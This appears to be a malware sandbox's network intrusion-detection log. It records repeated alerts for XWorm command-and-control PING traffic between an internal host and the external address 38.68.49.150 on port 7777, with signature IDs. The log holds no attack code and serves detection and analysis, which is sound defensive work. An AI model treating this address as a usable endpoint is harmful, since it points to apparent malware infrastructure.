2025-03-16T01:40:34.118952+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:34.228725+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:34.337786+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:34.447382+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:34.556802+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:34.665955+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:34.775243+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:34.888495+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:35.009828+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:35.043505+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49684	38.68.49.150	7777	TCP
2025-03-16T01:40:35.119229+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:35.228506+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:35.338098+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:35.447917+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:35.556628+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:35.666138+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:35.775275+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:35.889641+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:35.995537+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:36.105247+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:36.213647+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:36.322237+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:36.472394+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:36.619938+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:36.728619+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:36.862502+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:36.947237+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:37.056767+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:37.166565+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:37.275337+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:37.386500+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:37.494112+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:37.603530+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:37.712802+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:37.825710+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:37.931535+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:38.041202+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:38.150555+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:38.259690+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:38.369154+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:38.506501+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:38.587842+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:38.728883+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:38.837889+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:38.947146+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:39.056462+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:39.166013+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:39.275600+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:39.384663+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:39.494057+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:39.618605+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:39.712884+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:39.822477+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:39.931621+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:40.041020+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:40.150465+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:40.260567+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:40.369093+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:40.478745+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:40.587759+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:40.699797+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:40.806515+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:40.918886+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:41.025411+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:41.134684+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:41.258508+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:41.353548+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:41.462803+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:41.572323+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:41.681562+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:41.791015+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:41.900384+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:42.009920+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:42.121887+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:42.228699+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:42.529165+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:42.696608+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:42.806685+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:42.916015+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:43.025319+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:43.134570+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:43.243948+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:43.353486+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:43.462737+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:43.572281+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:43.681541+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:43.791024+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:43.903417+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:44.009847+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:44.119350+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:44.228399+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:44.337843+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:44.449264+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:44.556571+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:44.666203+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:44.775260+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:44.887501+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:45.009884+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:45.129161+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:45.329258+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:45.452618+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:45.556768+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:45.665947+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:45.775587+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:45.884864+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:45.994115+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:46.103549+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:46.221475+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:46.337784+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:46.447476+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:46.556652+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:46.665982+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:46.778348+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:46.884699+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:46.994187+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:47.103872+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:47.213018+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:47.322278+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:47.431544+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:47.540971+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:47.650569+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:47.759900+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:47.876108+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:47.979504+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:48.089819+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:48.197411+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:48.306850+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:48.416053+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:48.528325+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:48.635038+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:48.744342+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:48.866459+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:48.962850+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:49.073920+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:49.208799+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:49.322189+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:49.431526+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:49.561526+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:49.629510+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49684	38.68.49.150	7777	TCP
2025-03-16T01:40:49.666221+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:49.775447+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:49.885130+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:49.994161+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:50.103501+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:50.212919+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:50.346469+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:50.431608+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:50.548872+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:50.650369+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:50.759863+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:50.869083+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:50.978618+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:51.088097+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:51.197215+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:51.306799+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:51.400243+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:51.494071+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:51.591118+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:51.681595+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:51.790955+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:51.884829+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:51.978607+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:52.072422+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:52.165999+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:52.259733+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:52.353728+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:52.447285+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:52.541745+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:52.634842+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:52.728624+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:52.823961+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:52.915912+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:53.010067+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:53.103503+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:53.197188+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:53.294615+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:53.384821+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:53.478528+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:53.572420+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:53.669779+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:53.760407+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:53.885849+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:53.979951+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:54.072958+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:54.165849+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:54.259840+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:54.353534+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:54.447250+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:54.540910+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:54.634812+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP

ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-16T01:40:27.135291+0100	2852874	1	Malware Command and Control Activity Detected	38.68.49.150	7777	192.168.2.8	49684	TCP

ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-16T01:40:13.947183+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:14.056980+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:14.166187+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:14.275279+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:14.384661+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:14.507077+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:14.618978+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:14.754079+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:14.869292+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:15.197563+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:15.306616+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:15.415958+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:15.525200+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:15.634719+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:15.744341+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:15.853578+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:15.962753+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:16.098477+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:16.186847+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:16.306603+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:16.415975+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:16.556674+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:16.665935+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:16.775451+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:16.889673+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:17.009783+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:17.119262+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:17.228683+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:17.350441+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:17.447155+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:17.557756+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:17.667192+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:17.794284+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
